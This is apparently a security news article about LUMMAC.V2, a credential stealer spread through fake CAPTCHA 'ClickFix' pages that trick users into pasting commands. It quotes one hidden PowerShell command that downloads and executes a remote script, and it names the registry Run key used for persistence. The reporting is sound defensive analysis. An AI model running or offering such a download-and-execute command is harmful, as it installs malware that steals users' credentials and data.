Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities.
This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.
The malwareβs primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections.
What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits.
The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases.
When users click these links, theyβre redirected to deceptive websites that present as security verification pages with fake CAPTCHA challenges.
Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2βs attack methodology.
This technique tricks users into executing commands without realizing theyβre initiating malware installation.
The analysis reveals multiple delivery variations, though all begin with the same social engineering approach.
Malware LifecycleThe ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution.
When victims land on the fake CAPTCHA page, theyβre guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it.
The lifecycle shows an example of this deceptive page in action, while the below image reveals the underlying websiteβs source code designed to execute this attack.
Behind the scenes, a PowerShell command executes with the β-W Hiddenβ parameter to prevent any console window from appearing. A typical command looks like:-
PowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response. Content; iex $textThis command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
The LUMMAC.V2 campaign represents a significant threat not only due to its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.